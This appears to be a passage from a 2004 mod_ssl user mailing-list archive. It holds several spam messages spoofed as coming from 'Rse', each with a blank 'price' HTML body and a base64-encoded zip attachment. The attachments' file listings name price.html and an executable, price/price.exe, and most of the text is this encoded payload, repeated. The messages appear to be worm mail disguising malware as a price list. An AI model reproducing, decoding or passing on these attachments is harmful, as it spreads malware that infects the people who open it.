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

----------qfrtwfcxcoizohopwlby--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:59:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6FE9BA8945; Mon,  9 Aug 2004 22:59:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sgscbr.org (dl-nas1-joi-C8B062C5.p001.terra.com.br [200.176.98.197])
	by master.modssl.org (Postfix) with SMTP id 5D79CA893A
	for ; Mon,  9 Aug 2004 22:59:04 +0200 (CEST)
Date: Mon, 09 Aug 2004 17:58:02 -0800
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------yiwynpeeckbwlvzvrnyv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------yiwynpeeckbwlvzvrnyv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------yiwynpeeckbwlvzvrnyv
Content-Type: application/octet-stream; name="price2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price2.zip"

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

----------yiwynpeeckbwlvzvrnyv--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 23:38:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9099CA8CD1; Mon,  9 Aug 2004 23:38:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from IDC-lisaw.org (bdsl.66.12.95.34.gte.net [66.12.95.34])
	by master.modssl.org (Postfix) with SMTP id 688E8A8A4D
	for ; Mon,  9 Aug 2004 23:38:27 +0200 (CEST)
Date: Mon, 09 Aug 2004 14:38:17 -0800
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------rxwblqlnyolvdxcfqmvp"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------rxwblqlnyolvdxcfqmvp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------rxwblqlnyolvdxcfqmvp
Content-Type: application/octet-stream; name="newprice.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="newprice.zip"

UEsDBBQAAAAIANSBCTE3Aq1SCQIAAD4EAAAKAAAAcHJpY2UuaHRtbI1U34+aQBB+v+T+hzke
Ds0V8EfTMxVMLFJj43HNqfWxGZcRt8GFLKte0vi/d1F6LUqa7gNhZ+b7vplhBndDGA1ub9yc
SZ4pSFDEO4zJM77gHmcno6H9e5RAr5Sh2nhmJjkj5/S0tdHsa7xzJtCh+jLzXyZf5zAdhuPF
cBxckrl3lnWmXAnckidwz2NUqbQxy0Jt0YQ5HSSBB4bMaWL0y/A9SS/DwiRUowL7RjLnqWj2
iwTWO8GUvgEXucIkaTTh5+0NlIevoQF/wFmCap3KLdzf11nvPDCXXHQ7JlRYfp8kZVho2ZI0
hlHDDJ/ny0nY7SyHL+EkHNsbtU3MIrFLqCS1k+Ivx7Ga5Kk74OkEnjiTaZ6uFejCSQpSELxm
SSpJmkXeRWNg4EGnNsUoZbstCWUfJFc6QTdd/SCmgEeeEfOVAQce6e/ahg3xeKP0C0swzwu3
P51NRh9b7d6nx8DvWkHgD612O+paveCxbbX0CXod/4PfGhlaiKURrTDX02M+lNPyYBoD1zkL
DipdOAIlOV0UGpLKGWZUqep9bVVK8jjWAR6IEmQXHdplESqy52dvTdcLwRJrL07BgcBVQlGt
yoWaPVMo1UzrHFDSGd4oS333FjQKPg8X0/n3p+dR0LzmLCv/h9rVUJUSdVN0vGrp/0xpDaEm
Ohbb87Y0p11yHLCsQWXDXaf8a/wCUEsDBAoAAAAAAHQ5CTEAAAAAAAAAAAAAAAAGAAAAcHJp
Y2UvUEsDBBQAAAAIAA6CCTGcBSPJ6xMAAAA6AAAPAAAAcHJpY2UvcHJpY2UuZXhl7VoPcBzV
eX+SZSNAGAF2A66biGAITblFOp0OO8WpDulsi8j2WSdZBhybvd2n273b27fZPyedCsRUuMWo
atwEOtPOJOk0tOmElrQUipMyQfxpwK3JmJRp3AAZ4zL0iunUAy5oOgL1996u5JN2z6Vhpgwt
a79v933fe9/73ve+973ve6etNxPSQAhpRJmbI6Sb+M/8++H+5y4ndR7eJpMmpL9hGfnCfZ9I
zeOPkwsbzm9Y3kKaUEn6uJcvAmhFaQt6tvqDNgV95t/ECoRZeLX6bRfeCy+/Ofip9QT8IE+b
L0q9R3LpmIv33csCgfgEGkMsjku2KrsyIS3LfIRot2Jxu278l/xm5GQHQHtQzgu1m/55pnK2
Z2jyjZ3D2cnbmye9luHqWki5f9pd97XZzumJw3NvPrjv14h70XC2+g6mdmAFSOf++cGTJw5x
i7ll757DTzZzBhNPzxQI/jWiLNO4oHNec/VPeJf0bLfXdPjJFpCn0jOZOa91zmuZ82arR0Hl
bxdvwY43EryqWe3ZPd1EcwGqX5ybmzt/+sK7fkR48+YC0T4HBVbHfd77QXlIUFqqvytQpwtN
Gl+OOe90gfOfW815HUjPdL54/rT7ZY47LSSYEcQXQAR+0B+sBSy0PL4y1XPwOTV0aoB3mMnw
2Yn2RwWzN9Dl8sLcnPdGdRlvl65m+PcTmMbkF6v88xv41Mg+Ivr5Qx1BVz7hCd7qqZNrtJf4
kA+gBm4tWutnMK3vonby9C0Lap2dSs9mtF8RPZurz3Gmr+xFrz/GV3dGfBcaoBPS7vP+ywZf
qV9v4PpsIlrTQpfr+dcFaOdXh3lVUF+7FUxI9Tz+jbKv+htQudbIv8b4F28uGlV/2Zd1h4Z5
BWxmCJ9iTZsHiGhzVU2bF0SbwkK7q/aIAd8S6OpvknlBhD7u49W1XExR/QteFaxE9QD/IhLA
VQtNbnuXW4j7GbC/ide/wtscE4t4z3zHuS6OqH4dTTHkJUAfmbtydxsIVw4KmBGwX8BLBVwr
